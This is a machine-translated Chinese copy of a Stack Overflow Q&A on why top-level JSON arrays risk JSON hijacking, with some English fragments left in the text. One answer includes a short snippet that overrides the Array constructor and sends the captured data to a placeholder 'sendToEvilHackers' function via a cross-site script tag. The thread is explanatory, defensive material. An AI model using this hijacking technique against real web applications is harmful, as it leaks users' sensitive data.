59
在下面的視頻中,在時間標記21:40,微軟的PDC發言人說,這是重要的,所有的JSON包裹,所以它不是一個頂級陣列:什麼是「頂級JSON陣列」,以及它們爲何存在安全風險?
https://channel9.msdn.com/Events/PDC/PDC09/FT12
什麼是解開的風險頂級陣列?
我應該如何檢查並查看我是否易受傷害?我從第三方購買了許多組件,並有外部供應商開發我的代碼。
A
回答
38
這是因爲幾年前耶利米格羅斯曼發現了非常interesting vulnerability that affects gmail。有些人通過使用unparseable cruft來解決這個漏洞(Mr bobince在這個頁面上的技術描述太棒了。)
微軟之所以這麼說,是因爲他們還沒有修補他們的瀏覽器(還)。 (編輯:最近版本的Edge和IE 10/11已經解決了這個問題。)Mozilla認爲這是json規範中的一個漏洞,因此他們在Firefox 3中修補了它。對於我的記錄,我完全同意Mozilla,它的不幸,但每個Web應用程序開發人員將不得不捍衛他們自己對這個非常模糊的漏洞。
10
我認爲這是因爲Array()構造函數可以重新定義。然而,這個問題並不是真正獨特的陣列。
我認爲攻擊(或一個可能的方式)是這樣的:
function Array(n) {
var self = this;
setTimeout(function() {
sendToEvilHackers(self);
}, 10);
return this;
}
瀏覽器(或某些瀏覽器),使用該構造的[n, n, n]數組符號。因此,CSRF攻擊可以利用與銀行的公開會話,使用<script>標籤訪問已知的JSON網址,然後您擁有poof。
相關問題
- 1. 爲什麼使用'*'作爲postMessage的targetOrigin存在安全風險?
- 2. Ajax最大的安全風險是什麼?它們如何被緩解?
- 3. IPv6:爲什麼IPv4映射地址存在安全風險?
- 4. 使用xpath有什麼安全風險?
- 5. lambda表達式序列化中的安全風險是什麼?
- 6. 初始化變量 - 爲什麼以及有什麼風險?
- 7. 可以image.src是一個安全風險?
- 8. AHAH是安全風險嗎?
- 9. 使用Flex時存在什麼安全風險
- 10. WordPress - 安全風險?
- 11. 什麼是sqlite開發標題以及如何安裝它們?
- 12. 您認爲會話複製是否存在安全風險?
- 13. 爲什麼跨域AJAX請求被標記爲「安全風險」?
- 14. SQL,Postgres OID,它們是什麼以及它們爲什麼有用?
- 15. WOFF字體,它們是什麼以及爲什麼要關心?
- 16. 什麼是armeabi以及他們爲什麼使用它
- 17. 符號常數:它們如何存儲以及它們的類型是什麼?
- 18. 資產使用/ bundles/path是否存在任何安全風險?
- 19. /var/run/docker.sock的Docker安全風險是什麼?
- 20. 設置Access-Control-Allow-Origin的安全風險是什麼?
- 21. EJB。什麼是它爲什麼存在以及它如何工作?
- 22. 下面的php代碼是否有涉及安全風險?
- 23. 如何以及爲什麼此代碼是線程安全的..?
- 24. 爲什麼我可以增加子類中重載方法的可見性,它不是安全風險嗎?
- 25. ObjectSpace - 它是什麼以及人們如何使用它?
- 26. 查看公共文件,是否存在大的安全風險?
- 27. 此視圖是否存在安全風險?
- 28. WCF查詢攔截器:此MSDN是否存在安全風險?
- 29. 使用<noscript>是否存在安全風險?
- 30. 是否使用dirname(__ FILE__)存在安全風險?
發送JSON數組中的敏感信息仍然2017年的安全風險? – jrahhali 2017-04-06 12:40:17
@jrahhali這個問題值得自己發帖,也許security.stackexchange.com會是一個好地方。 – rook 2017-04-06 17:59:56
看起來像某人所做的:https://security.stackexchange.com/q/155518 – 2017-11-09 14:47:58